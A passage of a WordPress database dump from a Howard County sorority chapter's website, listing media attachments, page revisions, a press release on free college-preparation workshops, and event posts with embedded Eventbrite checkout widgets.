07:40:18','2017-09-13 12:40:18','','zhopelogo','','inherit','closed','closed','','zhopelogo','','','2017-09-13 07:40:18','2017-09-13 12:40:18','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/zhopelogo.jpg',0,'attachment','image/jpeg',0),(1158,1,'2017-09-13 08:29:54','2017-09-13 13:29:54','','voterlogo','','inherit','closed','closed','','voterlogo','','','2017-09-13 08:29:54','2017-09-13 13:29:54','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/voterlogo.png',0,'attachment','image/png',0),(1159,1,'2017-09-14 08:05:03','2017-09-14 13:05:03','','Amicette','','inherit','closed','closed','','amicette-2','','','2017-09-14 08:05:03','2017-09-14 13:05:03','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Amicette.png',0,'attachment','image/png',0),(1160,1,'2017-09-14 08:06:00','2017-09-14 13:06:00','','AmicetteInformational (1)','','inherit','closed','closed','','amicetteinformational-1','','','2017-09-14 08:06:00','2017-09-14 13:06:00','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/AmicetteInformational-1.png',0,'attachment','image/png',0),(1162,1,'2017-09-14 11:34:35','2017-09-14 16:34:35','','2017FinalZenLogo','','inherit','closed','closed','','2017finalzenlogo','','','2017-09-14 11:34:35','2017-09-14 16:34:35','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/2017FinalZenLogo.png',0,'attachment','image/png',0),(1163,1,'2017-09-15 22:33:18','2017-09-16 03:33:18','','image1 (2)','','inherit','closed','closed','','image1-2','','','2017-09-15 22:33:18','2017-09-16 03:33:18','',493,'https://zphiblgz.org/wp-content/uploads/2016/11/image1-2.png',0,'attachment','image/png',0),(1164,1,'2017-09-15 22:34:31','2017-09-16 03:34:31','','BOGThumbnail','','inherit','closed','closed','','bogthumbnail','','','2017-09-15 22:34:31','2017-09-16 03:34:31','',493,'https://zphiblgz.org/wp-content/uploads/2016/11/BOGThumbnail.png',0,'attachment','image/png',0),(1166,1,'2017-09-16 11:24:57','2017-09-16 16:24:57','','adoptaroad','','inherit','closed','closed','','adoptaroad','','','2017-09-16 11:24:57','2017-09-16 16:24:57','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/adoptaroad.jpg',0,'attachment','image/jpeg',0),(1167,1,'2017-09-16 11:25:42','2017-09-16 16:25:42','','Adoptahighway','','inherit','closed','closed','','adoptahighway','','','2017-09-16 11:25:42','2017-09-16 16:25:42','',0,'https://zphiblgz.org/wp-content/uploads/2017/09/Adoptahighway.png',0,'attachment','image/png',0),(1353,6,'2020-01-18 20:45:31','2020-01-19 01:45:31','','IMG_0726','','inherit','closed','closed','','img_0726','','','2020-01-18 20:45:31','2020-01-19 01:45:31','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0726.jpg',0,'attachment','image/jpeg',0),(1354,6,'2020-01-18 20:46:37','2020-01-19 01:46:37','','IMG_0732','','inherit','closed','closed','','img_0732','','','2020-01-18 20:46:37','2020-01-19 01:46:37','',0,'https://zphiblgz.org/wp-content/uploads/2020/01/IMG_0732.jpg',0,'attachment','image/jpeg',0),(1173,1,'2017-09-22 22:12:18','2017-09-23 03:12:18','','LGZScholarshipReleaseForm','','inherit','closed','closed','','lgzscholarshipreleaseform','','','2017-09-22 22:12:18','2017-09-23 03:12:18','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/LGZScholarshipReleaseForm.pdf',0,'attachment','application/pdf',0),(1455,1,'2021-09-22 13:23:21','2021-09-22 18:23:21','','2021 scholarship recipient 1','','inherit','closed','closed','','2021-scholarship-recipient-1','','','2021-09-22 13:23:21','2021-09-22 18:23:21','',0,'https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-1.png',0,'attachment','image/png',0),(1175,1,'2017-09-22 22:58:45','2017-09-23 03:58:45','[button icon=\"icon-noicon\" text=\"\" url=\"\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#FFFFFF\" ][/button]','W. Ruth Conway Scholarship','','inherit','closed','closed','','797-revision-v1','','','2017-09-22 22:58:45','2017-09-23 03:58:45','',797,'https://zphiblgz.org/797-revision-v1/',0,'revision','',0),(1186,1,'2017-10-03 07:39:32','2017-10-03 12:39:32','','Morebirthdays','','inherit','closed','closed','','morebirthdays','','','2017-10-03 07:39:32','2017-10-03 12:39:32','',0,'https://zphiblgz.org/wp-content/uploads/2017/10/Morebirthdays.png',0,'attachment','image/png',0),(1193,1,'2017-10-15 07:31:49','2017-10-15 12:31:49','','IMG_1219','','inherit','closed','closed','','img_1219','','','2017-10-15 07:31:49','2017-10-15 12:31:49','',0,'https://zphiblgz.org/wp-content/uploads/2017/10/IMG_1219.png',0,'attachment','image/png',0),(1196,1,'2017-10-18 07:45:32','2017-10-18 12:45:32','','hcpss-logo-outlined','','inherit','closed','closed','','hcpss-logo-outlined','','','2017-10-18 07:45:32','2017-10-18 12:45:32','',0,'https://zphiblgz.org/wp-content/uploads/2017/10/hcpss-logo-outlined.png',0,'attachment','image/png',0),(1203,1,'2017-10-22 23:36:49','2017-10-23 04:36:49','','Spirit Night (2)','','inherit','closed','closed','','spirit-night-2','','','2017-10-22 23:36:49','2017-10-23 04:36:49','',0,'https://zphiblgz.org/wp-content/uploads/2017/10/Spirit-Night-2.pdf',0,'attachment','application/pdf',0),(1204,1,'2017-10-22 23:38:47','2017-10-23 04:38:47','','Spirit Night','','inherit','closed','closed','','spirit-night','','','2017-10-22 23:38:47','2017-10-23 04:38:47','',0,'https://zphiblgz.org/wp-content/uploads/2017/10/Spirit-Night.png',0,'attachment','image/png',0),(1205,1,'2017-10-22 23:41:58','2017-10-23 04:41:58','','YouthSpiritNight','','inherit','closed','closed','','youthspiritnight','','','2017-10-22 23:41:58','2017-10-23 04:41:58','',0,'https://zphiblgz.org/wp-content/uploads/2017/10/YouthSpiritNight.png',0,'attachment','image/png',0),(1209,1,'2017-10-27 17:33:49','2017-10-27 22:33:49','','5th Annual Denim & Pearls','','publish','closed','closed','','5th-annual-denim-pearls','','','2017-10-27 17:33:50','2017-10-27 22:33:50','',0,'https://zphiblgz.org/5th-annual-denim-pearls/',0,'wpplugin_evt_button','',0),(1284,1,'2018-08-13 02:18:12','2018-08-13 07:18:12','','26815367_1555517271150280_7321703591062839456_n','','inherit','closed','closed','','26815367_1555517271150280_7321703591062839456_n','','','2018-08-13 02:18:12','2018-08-13 07:18:12','',0,'https://zphiblgz.org/wp-content/uploads/2018/08/26815367_1555517271150280_7321703591062839456_n.jpg',0,'attachment','image/jpeg',0),(1285,1,'2018-08-13 02:18:57','2018-08-13 07:18:57','','26815367_1555517271150280_7321703591062839456_n','','inherit','closed','closed','','26815367_1555517271150280_7321703591062839456_n-2','','','2018-08-13 02:18:57','2018-08-13 07:18:57','',0,'https://zphiblgz.org/wp-content/uploads/2018/08/26815367_1555517271150280_7321703591062839456_n-1.jpg',0,'attachment','image/jpeg',0),(1286,1,'2018-08-14 11:09:40','2018-08-14 16:09:40','','ZHope','','inherit','closed','closed','','247-revision-v1','','','2018-08-14 11:09:40','2018-08-14 16:09:40','',247,'https://zphiblgz.org/247-revision-v1/',0,'revision','',0),(1287,1,'2018-08-14 11:13:11','2018-08-14 16:13:11','','Service','','publish','closed','closed','','service','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=1287',6,'nav_menu_item','',0),(1288,1,'2018-08-14 11:14:27','0000-00-00 00:00:00','','Contact Us','','draft','closed','closed','','','','','2018-08-14 11:14:27','2018-08-14 16:14:27','',0,'https://zphiblgz.org/?page_id=1288',0,'page','',0),(1214,1,'2017-10-27 18:34:21','0000-00-00 00:00:00','','5th Annual Denim & Pearls Ticket','','draft','closed','closed','','','','','2017-10-27 18:34:21','2017-10-27 23:34:21','',0,'https://zphiblgz.org/?post_type=product&#038;p=1214',0,'product','',0),(1215,1,'2017-10-29 14:31:25','2017-10-29 19:31:25','','LGZ Pic','','inherit','closed','closed','','lgz-pic','','','2017-10-29 14:31:25','2017-10-29 19:31:25','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZ-Pic.png',0,'attachment','image/png',0),(1218,1,'2017-11-05 20:26:39','2017-11-06 01:26:39','','ProjectLinusCalendar','','inherit','closed','closed','','projectlinuscalendar','','','2017-11-05 20:26:39','2017-11-06 01:26:39','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/ProjectLinusCalendar.png',0,'attachment','image/png',0),(1298,1,'2018-09-14 22:09:15','2018-09-15 03:09:15','Are you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process? \r\n\r\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\r\n\r\nIn addition, participants will receive a free template on how to organize their college applications.\r\n\r\n[raw]\r\n<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>\r\n[/raw]','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','draft','closed','open','','nb1','','','2018-11-03 12:10:06','2018-11-03 17:10:06','',0,'https://zphiblgz.org/?post_type=event&#038;p=1298',0,'event','',0),(1221,1,'2017-11-05 20:41:07','2017-11-06 01:41:07','','NicholasClaud','','inherit','closed','closed','','nicholasclaud','','','2017-11-05 20:41:07','2017-11-06 01:41:07','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/NicholasClaud.png',0,'attachment','image/png',0),(1299,1,'2018-09-14 22:04:11','2018-09-15 03:04:11','','NutsandBoltsCalendarImage','','inherit','closed','closed','','nutsandboltscalendarimage','','','2018-09-14 22:04:11','2018-09-15 03:04:11','',1298,'https://zphiblgz.org/wp-content/uploads/2018/09/NutsandBoltsCalendarImage.png',0,'attachment','image/png',0),(1223,1,'2017-11-05 20:44:30','2017-11-06 01:44:30','','Journey','','inherit','closed','closed','','journey','','','2017-11-05 20:44:30','2017-11-06 01:44:30','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/Journey.png',0,'attachment','image/png',0),(1225,1,'2017-11-05 21:10:57','2017-11-06 02:10:57','','NoPicture','','inherit','closed','closed','','nopicture','','','2017-11-05 21:10:57','2017-11-06 02:10:57','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/NoPicture.png',0,'attachment','image/png',0),(1227,1,'2017-11-05 21:13:21','2017-11-06 02:13:21','','Dula','','inherit','closed','closed','','dula','','','2017-11-05 21:13:21','2017-11-06 02:13:21','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/Dula.png',0,'attachment','image/png',0),(1229,1,'2017-11-05 21:29:53','2017-11-06 02:29:53','','Yasmine','','inherit','closed','closed','','yasmine','','','2017-11-05 21:29:53','2017-11-06 02:29:53','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/Yasmine.png',0,'attachment','image/png',0),(1231,1,'2017-11-05 21:37:10','2017-11-06 02:37:10','','Oretta','','inherit','closed','closed','','oretta','','','2017-11-05 21:37:10','2017-11-06 02:37:10','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/Oretta.png',0,'attachment','image/png',0),(1306,1,'2018-09-14 22:26:02','2018-09-15 03:26:02','','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:26:02','2018-09-15 03:26:02','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(1305,1,'2018-09-14 22:23:21','2018-09-15 03:23:21','<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:23:21','2018-09-15 03:23:21','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(1233,1,'2017-11-05 21:47:11','2017-11-06 02:47:11','','josephine','','inherit','closed','closed','','josephine','','','2017-11-05 21:47:11','2017-11-06 02:47:11','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/josephine.png',0,'attachment','image/png',0),(1235,1,'2017-11-08 09:42:41','2017-11-08 14:42:41','','EventImage','','inherit','closed','closed','','eventimage','','','2017-11-08 09:42:41','2017-11-08 14:42:41','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/EventImage.png',0,'attachment','image/png',0),(1236,1,'2017-11-08 09:43:30','2017-11-08 14:43:30','','Nuts & Bolts Financial Aid','','inherit','closed','closed','','nuts-bolts-financial-aid','','','2017-11-08 09:43:30','2017-11-08 14:43:30','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/Nuts-Bolts-Financial-Aid.png',0,'attachment','image/png',0),(1237,1,'2017-11-08 09:44:38','2017-11-08 14:44:38','','FinancialAid (1)','','inherit','closed','closed','','financialaid-1','','','2017-11-08 09:44:38','2017-11-08 14:44:38','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/FinancialAid-1.png',0,'attachment','image/png',0),(1240,1,'2017-11-11 21:12:30','2017-11-12 02:12:30','','HCCLogo','','inherit','closed','closed','','hcclogo','','','2017-11-11 21:12:30','2017-11-12 02:12:30','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/HCCLogo.jpeg',0,'attachment','image/jpeg',0),(1243,1,'2017-11-14 22:04:57','2017-11-15 03:04:57','<p style=\"text-align: center;\">LGZ LAUNCHES NEW COLLEGE PREPARATION WORKSHOPS</p>\r\n<p style=\"text-align: left;\"><strong style=\"font-style: italic;\">Columbia, MD -</strong> The Lambda Gamma Zeta Chapter of Howard County, MD is excited to announce a new series of workshops that will help Howard County residents prepare for paying and applying for college.</p>\r\nThe Nuts and Bolts series features two workshops; Understanding Financial Aid and Writing for Success. The Understanding Financial Aid workshop will be held at the Media Center at Wilde Lake High School on December 5th at 6:30 PM. The workshop is free to parents, students, and members of the community.\r\n\r\nLGZ has been serving the Howard County community for 36 years. In addition to various partnerships and other community involvement, LGZ offers the W. Ruth Conway Scholarship for African American graduating seniors of Howard County and Women of Color attending Howard Community College.\r\n\r\nKathy Ball, the W. Ruth Conway Scholarship Co-Chair states \"It\'s really exciting to be able to expand our outreach into the community and our partnership with Howard County Public Schools\". For more information about the workshop, scholarship, or LGZ, visit www.zphiblgz.org.','LGZ Launches New College Preparation Workshops','','publish','closed','open','','lgz-launches-new-college-preparation-workshops','','','2017-11-14 22:06:55','2017-11-15 03:06:55','',0,'https://zphiblgz.org/?p=1243',0,'post','',0),(1244,1,'2017-11-14 22:04:57','2017-11-15 03:04:57','<em><strong>Columbia, MD -</strong> </em>The Lambda Gamma Zeta Chapter of Howard County, MD is excited to announce a new series of workshops that will help Howard County residents prepare for paying and applying for college.\r\n\r\nThe Nuts and Bolts series features two workshops; Understanding Financial Aid and Writing for Success. The Understanding Financial Aid workshop will be held at the Media Center at Wilde Lake High School on December 5th at 6:30 PM. The workshop is free to parents, students, and members of the community.\r\n\r\nLGZ has been serving the Howard County community for 36 years. In addition to various partnerships and other community involvement, LGZ offers the W. Ruth Conway Scholarship for African American graduating seniors of Howard County and Women of Color attending Howard Community College.\r\n\r\nKathy Ball, the W. Ruth Conway Scholarship Co-Chair states \"It\'s really exciting to be able to expand our outreach into the community and our partnership with Howard County Public Schools\". For more information about the workshop, scholarship, or LGZ, visit www.zphiblgz.org.','LGZ Launches New College Preparation Workshops','','inherit','closed','closed','','1243-revision-v1','','','2017-11-14 22:04:57','2017-11-15 03:04:57','',1243,'https://zphiblgz.org/1243-revision-v1/',0,'revision','',0),(1245,1,'2017-11-14 22:06:32','2017-11-15 03:06:32','<p style=\"text-align: center;\">LGZ LAUNCHES NEW COLLEGE PREPARATION WORKSHOPS</p>\n<p style=\"text-align: center;\"><strong style=\"font-style: italic;\">Columbia, MD -</strong> The Lambda Gamma Zeta Chapter of Howard County, MD is excited to announce a new series of workshops that will help Howard County residents prepare for paying and applying for college.</p>\nThe Nuts and Bolts series features two workshops; Understanding Financial Aid and Writing for Success. The Understanding Financial Aid workshop will be held at the Media Center at Wilde Lake High School on December 5th at 6:30 PM. The workshop is free to parents, students, and members of the community.\n\nLGZ has been serving the Howard County community for 36 years. In addition to various partnerships and other community involvement, LGZ offers the W. Ruth Conway Scholarship for African American graduating seniors of Howard County and Women of Color attending Howard Community College.\n\nKathy Ball, the W. Ruth Conway Scholarship Co-Chair states \"It\'s really exciting to be able to expand our outreach into the community and our partnership with Howard County Public Schools\". For more information about the workshop, scholarship, or LGZ, visit www.zphiblgz.org.','LGZ Launches New College Preparation Workshops','','inherit','closed','closed','','1243-autosave-v1','','','2017-11-14 22:06:32','2017-11-15 03:06:32','',1243,'https://zphiblgz.org/1243-autosave-v1/',0,'revision','',0),(1246,1,'2017-11-14 22:06:55','2017-11-15 03:06:55','<p style=\"text-align: center;\">LGZ LAUNCHES NEW COLLEGE PREPARATION WORKSHOPS</p>\r\n<p style=\"text-align: left;\"><strong style=\"font-style: italic;\">Columbia, MD -</strong> The Lambda Gamma Zeta Chapter of Howard County, MD is excited to announce a new series of workshops that will help Howard County residents prepare for paying and applying for college.</p>\r\nThe Nuts and Bolts series features two workshops; Understanding Financial Aid and Writing for Success. The Understanding Financial Aid workshop will be held at the Media Center at Wilde Lake High School on December 5th at 6:30 PM. The workshop is free to parents, students, and members of the community.\r\n\r\nLGZ has been serving the Howard County community for 36 years. In addition to various partnerships and other community involvement, LGZ offers the W. Ruth Conway Scholarship for African American graduating seniors of Howard County and Women of Color attending Howard Community College.\r\n\r\nKathy Ball, the W. Ruth Conway Scholarship Co-Chair states \"It\'s really exciting to be able to expand our outreach into the community and our partnership with Howard County Public Schools\". For more information about the workshop, scholarship, or LGZ, visit www.zphiblgz.org.','LGZ Launches New College Preparation Workshops','','inherit','closed','closed','','1243-revision-v1','','','2017-11-14 22:06:55','2017-11-15 03:06:55','',1243,'https://zphiblgz.org/1243-revision-v1/',0,'revision','',0),(1250,1,'2017-11-21 18:55:24','2017-11-21 23:55:24','','DPCalendarThumbnail','','inherit','closed','closed','','dpcalendarthumbnail','','','2017-11-21 18:55:24','2017-11-21 23:55:24','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/DPCalendarThumbnail.png',0,'attachment','image/png',0),(1252,1,'2017-11-21 19:20:09','2017-11-22 00:20:09','','IMG_1576','','inherit','closed','closed','','img_1576','','','2017-11-21 19:20:09','2017-11-22 00:20:09','',0,'https://zphiblgz.org/wp-content/uploads/2017/11/IMG_1576.png',0,'attachment','image/png',0),(1256,1,'2017-12-08 18:20:06','2017-12-08 23:20:06','','APPACalendar','','inherit','closed','closed','','appacalendar','','','2017-12-08 18:20:06','2017-12-08 23:20:06','',0,'https://zphiblgz.org/wp-content/uploads/2016/11/APPACalendar.png',0,'attachment','image/png',0),(1259,1,'2017-12-12 17:54:10','2017-12-12 22:54:10','','CalendarThumbnail','','inherit','closed','closed','','calendarthumbnail','','','2017-12-12 17:54:10','2017-12-12 22:54:10','',0,'https://zphiblgz.org/wp-content/uploads/2017/12/CalendarThumbnail.png',0,'attachment','image/png',0),(1261,1,'2017-12-12 18:02:28','2017-12-12 23:02:28','','APPACalendar','','inherit','closed','closed','','appacalendar-2','','','2017-12-12 18:02:28','2017-12-12 23:02:28','',0,'https://zphiblgz.org/wp-content/uploads/2016/11/APPACalendar-1.png',0,'attachment','image/png',0),(1264,1,'2018-01-20 11:28:29','2018-01-20 16:28:29','','2017ChapterLOGO','','inherit','closed','closed','','2017chapterlogo','','','2018-01-20 11:28:29','2018-01-20 16:28:29','',0,'https://zphiblgz.org/wp-content/uploads/2018/01/2017ChapterLOGO.png',0,'attachment','image/png',0),(1269,1,'2018-03-21 22:28:48','2018-03-22 03:28:48','','HowardCountyLogoCalendar','','inherit','closed','closed','','howardcountylogocalendar','','','2018-03-21 22:28:48','2018-03-22 03:28:48','',0,'https://zphiblgz.org/wp-content/uploads/2018/03/HowardCountyLogoCalendar.png',0,'attachment','image/png',0),(1271,1,'2018-03-21 22:33:28','2018-03-22 03:33:28','','MSWALKCalendarImage','','inherit','closed','closed','','mswalkcalendarimage','','','2018-03-21 22:33:28','2018-03-22 03:33:28','',0,'https://zphiblgz.org/wp-content/uploads/2017/03/MSWALKCalendarImage.png',0,'attachment','image/png',0),(1276,1,'2018-05-19 13:32:09','2018-05-19 18:32:09','','Introducing Spring 2018','','inherit','closed','closed','','introducing-spring-2018','','','2018-05-19 13:32:09','2018-05-19 18:32:09','',0,'https://zphiblgz.org/wp-content/uploads/2018/05/Introducing-Spring-2018.png',0,'attachment','image/png',0),(1277,1,'2018-05-19 13:34:48','2018-05-19 18:34:48','','Chapter','','inherit','closed','closed','','chapter','','','2018-05-19 13:34:48','2018-05-19 18:34:48','',0,'https://zphiblgz.org/wp-content/uploads/2018/05/Chapter.png',0,'attachment','image/png',0),(1278,1,'2018-05-19 13:37:37','2018-05-19 18:37:37','','Award','','inherit','closed','closed','','award','','','2018-05-19 13:37:37','2018-05-19 18:37:37','',0,'https://zphiblgz.org/wp-content/uploads/2018/05/Award.png',0,'attachment','image/png',0),(1281,1,'2018-06-11 22:30:10','2018-06-12 03:30:10','','EC_Calendar','','inherit','closed','closed','','ec_calendar','','','2018-06-11 22:30:10','2018-06-12 03:30:10','',0,'https://zphiblgz.org/wp-content/uploads/2018/06/EC_Calendar.png',0,'attachment','image/png',0),(1307,1,'2018-09-14 22:31:44','2018-09-15 03:31:44','\r\n\r\n\r\n<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\nAre you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process? \r\n\r\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\r\n\r\nIn addition, participants will receive a free template on how to organize their college applications.\r\n[raw]<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>\r\n[/raw]','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:31:44','2018-09-15 03:31:44','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(1308,1,'2018-09-14 22:34:07','2018-09-15 03:34:07','Are you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process? \r\n\r\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\r\n\r\nIn addition, participants will receive a free template on how to organize their college applications.\r\n\r\n[raw]\r\n<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>\r\n[/raw]','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:34:07','2018-09-15 03:34:07','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(1309,1,'2018-09-14 23:21:33','2018-09-15 04:21:33','Are you a student preparing to attend college? Are you a parent trying to figure out how to get money for your student\'s education?\r\n\r\nThis FREE workshop will explain the different types of financial aid and how to successfully complete the financial aid process. There will be a Q & A session for students and parents to gain as much information as possible.\r\n\r\n[raw]\r\n<div id=\"eventbrite-widget-container-48964990605\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48964990605\',\r\n        iframeContainerId: \'eventbrite-widget-container-48964990605\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>\r\n[/raw]','Nuts and Bolts Workshop Series: Getting Money (Understanding and Applying for Financial Aid)','','draft','closed','open','','nuts-and-bolts-workshop-series-getting-money-understanding-and-applying-for-financial-aid','','','2018-11-30 08:58:19','2018-11-30 13:58:19','',0,'https://zphiblgz.org/?post_type=event&#038;p=1309',0,'event','',0),(1310,1,'2018-09-14 23:21:33','2018-09-15 04:21:33','Are you a student preparing to attend college? Are you a parent trying to figure out how to get money for your student\'s education?\r\n\r\nThis FREE workshop will explain the different types of financial aid and how to successfully complete the financial aid process. There will be a Q & A session for students and parents to gain as much information as possible.\r\n\r\n[raw]\r\n<div id=\"eventbrite-widget-container-48964990605\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48964990605\',\r\n        iframeContainerId: \'eventbrite-widget-container-48964990605\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>\r\n[/raw]','Nuts and Bolts Workshop Series: Getting Money (Understanding and Applying for Financial Aid)','','inherit','closed','closed','','1309-revision-v1','','','2018-09-14 23:21:33','2018-09-15 04:21:33','',1309,'https://zphiblgz.org/1309-revision-v1/',0,'revision','',0),(1311,1,'2018-09-14 23:30:28','2018-09-15 04:30:28','','Z-HOPE','','inherit','closed','closed','','247-revision-v1','','','2018-09-14 23:30:28','2018-09-15 04:30:28','',247,'https://zphiblgz.org/247-revision-v1/',0,'revision','',0),(1312,1,'2018-09-14 23:50:53','2018-09-15 04:50:53','','MembershipImage','','inherit','closed','closed','','membershipimage','','','2018-09-14 23:50:53','2018-09-15 04:50:53','',6,'https://zphiblgz.org/wp-content/uploads/2018/09/MembershipImage.png',0,'attachment','image/png',0),(1313,1,'2018-09-15 00:29:03','2018-09-15 05:29:03','','Sorority Membership','','publish','closed','closed','','sorority-membership','','','2018-09-15 00:47:13','2018-09-15 05:47:13','',0,'https://zphiblgz.org/?page_id=1313',0,'page','',0),(1314,1,'2018-09-15 00:11:59','2018-09-15 05:11:59','','ChapterMembership','','inherit','closed','closed','','chaptermembership','','','2018-09-15 00:11:59','2018-09-15 05:11:59','',1313,'https://zphiblgz.org/wp-content/uploads/2018/09/ChapterMembership.png',0,'attachment','image/png',0),(1315,1,'2018-09-15 00:29:03','2018-09-15 05:29:03','','Sorority Membership','','inherit','closed','closed','','1313-revision-v1','','','2018-09-15 00:29:03','2018-09-15 05:29:03','',1313,'https://zphiblgz.org/1313-revision-v1/',0,'revision','',0),(1401,1,'2020-07-09 13:42:49','2020-07-09 18:42:49','','all youth logos','','inherit','closed','closed','','all-youth-logos','','','2020-07-09 13:42:49','2020-07-09 18:42:49','',738,'https://zphiblgz.org/wp-content/uploads/2020/07/all-youth-logos.png',0,'attachment','image/png',0),(1318,1,'2018-09-15 01:00:51','2018-09-15 06:00:51','','Membership','','publish','closed','closed','','1318','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=1318',3,'nav_menu_item','',0),(1355,6,'2020-01-18 20:48:29','2020-01-19 01:48:29','','IMG_0728','','inherit','closed','closed','','img_0728','','','2020-01-18 20:48:29','2020-01-19 